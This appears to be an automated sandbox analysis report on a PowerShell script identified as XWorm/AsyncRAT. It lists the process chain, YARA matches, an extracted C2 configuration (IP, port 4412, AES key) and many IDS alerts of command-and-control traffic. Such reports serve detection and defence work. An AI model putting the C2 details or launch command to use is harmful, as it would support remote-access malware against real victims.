Windows
Analysis Report
b.ps1
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
powershell.exe (PID: 3716 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\b.p s1" MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 5620 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) RegSvcs.exe (PID: 6568 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94) WerFault.exe (PID: 3788 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 6 568 -s 880 MD5: C31336C1EFC2CCB44B4326EA793040F2) wermgr.exe (PID: 7140 cmdline:
"C:\Window s\system32 \wermgr.ex e" "-outpr oc" "0" "3 716" "2640 " "2540" " 2656" "0" "0" "2660" "0" "0" " 0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution |
{
"C2 url": [
"176.113.115.228"
],
"Port": 4412,
"Aes key": "P0WER",
"SPL": "<Xwormmm>",
"Install file": "USB.exe"
}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
Click to see the 6 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io |
| |
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io |
| |
Click to see the 10 entries |
System Summary |
---|
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-26T10:34:28.769948+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:36.918088+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:40.555436+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:34:52.350845+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:04.163753+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:06.917867+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:15.963703+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:25.653662+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:25.854717+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:26.619507+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:31.488042+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:31.901153+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:36.906588+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:41.125293+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:52.921008+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:35:56.558294+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.438235+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.562563+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.688443+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.811883+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:03.934237+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:06.915056+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:08.851433+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:08.974394+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:09.104641+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:09.576639+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.254524+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.255919+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.256062+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.256207+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:22.472568+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:24.397558+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:34.555246+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:35.219704+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:36.902304+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:47.007422+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:36:58.808052+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:04.368257+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:06.917682+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:07.432087+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:11.273258+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:23.070700+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:31.646275+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:31.767760+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:36.936336+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:43.523152+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-26T10:34:28.814226+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:34:40.558655+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:34:52.357325+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:04.166179+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:15.967787+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:25.655476+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:25.864086+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:26.643517+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:31.490610+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:31.946435+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:41.127120+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:52.923666+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:35:56.564382+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.442442+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.564213+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.689951+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.820321+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:03.942247+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:08.857621+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:08.976077+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:09.106351+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:09.578400+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:22.257763+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:22.474521+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:24.399249+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:34.559337+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:35.221750+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:47.011390+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:36:58.809874+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:04.373284+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:07.434211+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:11.275725+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:23.204297+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:31.648147+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:31.769145+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:43.537690+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-26T10:34:36.918088+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-26T10:36:24.180863+0100 | 2858799 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
- • AV Detection
- • Compliance
- • Spreading
- • Networking
- • Key, Mouse, Clipboard, Microphone and Screen Capturing
- • System Summary
- • Data Obfuscation
- • Hooking and other Techniques for Hiding and Protection
- • Malware Analysis System Evasion
- • Anti Debugging
- • HIPS / PFW / Operating System Protection Evasion
- • Language, Device and Operating System Detection
- • Lowering of HIPS / PFW / Operating System Security Settings
- • Stealing of Sensitive Information
- • Remote Access Functionality
Click to jump to signature section
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link |
Source: | Integrated Neural Analysis Model: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Window created: | Jump to behavior |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Process Stats: |
Source: | Code function: | 0_2_00007FF84900103D | |
Source: | Code function: | 3_2_01506340 | |
Source: | Code function: | 3_2_0150C2D8 | |
Source: | Code function: | 3_2_0150B598 | |
Source: | Code function: | 3_2_015084B8 | |
Source: | Code function: | 3_2_01505A70 | |
Source: | Code function: | 3_2_01502C88 | |
Source: | Code function: | 3_2_01505728 | |
Source: | Code function: | 3_2_01500FA0 |
Source: | Process created: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: |
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: | ||
Source: | Security API names: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: |
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: |
Source: | Code function: | 0_2_00007FF848F35829 | |
Source: | Code function: | 3_2_01508081 | |
Source: | Code function: | 3_2_01504CD1 |
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: | ||
Source: | High entropy of concatenated method names: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
